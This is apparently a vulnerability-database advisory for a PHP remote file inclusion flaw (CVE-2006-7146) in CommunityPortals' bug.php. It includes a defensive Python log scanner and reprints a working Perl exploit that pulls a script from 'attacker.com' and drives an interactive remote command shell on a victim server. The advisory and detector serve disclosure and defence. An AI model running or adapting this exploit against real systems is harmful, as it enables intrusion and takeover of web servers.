CommunityPortals Bug.PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111241    Vulnerability type: Code injection
Published: 2006-10-11    Updated: 2009-03-16
CVE ID: CVE-2006-7146    CNNVD-ID: CNNVD-200703-239
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/28786
https://cxsecurity.com/issue/WLB-2007030085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-239
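|Vulnerability details
**DISPUTED** A PHP remote file inclusion vulnerability exists in bug.php in Leicestershire communityPortals 1.0 build 20051018 and earlier. A remote attacker can execute arbitrary PHP code via a URL in the cp_root_path parameter. This vulnerability is different from CVE-2006-5280.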
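As an added example (not part of the original advisory or of the project's code), the following Python script scans web access logs for the request shape described above: a call to bug.php whose cp_root_path parameter holds a URL instead of a local path. The combined log format, the function and variable names, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Client address and request target from a combined-format access log line
# (log format is an assumption; adjust the pattern to the server's format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>[^"]*?) HTTP/[\d.]+"')
# A value that begins with "scheme://" or a protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|//)', re.IGNORECASE)


def find_rfi_attempts(lines, script="bug.php", param="cp_root_path"):
    """Return (client_ip, decoded_value) for each request to `script`
    whose `param` query parameter carries a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        # Split on the first "?" only: an injected URL may contain its own "?".
        path, _, query = m["target"].partition("?")
        if not unquote(path).lower().endswith("/" + script):
            continue
        # parse_qsl percent-decodes names and values once, as the server would.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append((m["ip"], value))
    return hits


# Constructed sample lines (documentation addresses and example domains only).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Oct/2006:10:01:02 +0000] "GET /CommunityPortals//bug.php'
    '?cp_root_path=http://files.example/inc.txt?cmd=id? HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [11/Oct/2006:10:01:09 +0000] "GET /CommunityPortals/bug.php'
    '?cp_root_path=hTtP%3A%2F%2Ffiles.example%2Finc.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [11/Oct/2006:10:02:00 +0000] "GET /CommunityPortals/bug.php'
    '?id=12 HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.4 - - [11/Oct/2006:10:02:05 +0000] "GET /CommunityPortals/index.php'
    '?ref=http://www.example.org/ HTTP/1.1" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for ip, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible remote file inclusion from {ip}: cp_root_path={value}")
```

Only the query string recorded in the access log is inspected; values sent in a request body do not appear there and need a different data source.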
|Exploit
source: http://www.securityfocus.com/bid/20466/info

CommunityPortals is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

CommunityPortals 1.0 Build 12-31-18 and prior versions are affected by this issue.

#!/usr/bin/perl

#################################################################
#                                                               #
#            CommunityPortals Build 12-31-18                    #
#                                                               #
# Class:     Remote File Include Vulnerability                  #
#                                                               #
# Patch:     unavailable                                        #
#                                                               #
# Date:      2006/10/11                                         #
#                                                               #
# Remote:    Yes                                                #
#                                                               #
# Type:      high                                               #
#                                                               #
# Site:      http://www.leicestershirecommunity.com             #
#                                                               #
#################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your Personal Script

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "# CommunityPortals <= 1.0   Remote File Include Vulnerability   #\n";
print "# Bug found By : Ashiyane Corporation                           #\n";
print "# Email: Nima Salehi    nima[at]ashiyane.ir                     #\n";
print "# Web Site : www.Ashiyane.ir                                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV < 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
    print "\n EX : Ashiyane.pl www.victim.com /CommunityPortals/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path."/bug.php?cp_root_path=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "<Shell> ";
    $cmd = <STDIN>;
}
|References

Source: BID
Name: 20467
Link: http://www.securityfocus.com/bid/20467
Source: BUGTRAQ
Name: 20061011 CommunityPortals <= 1.0 Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/448311/100/0/threaded
Source: SREASON
Name: 2387
Link: http://securityreason.com/securityalert/2387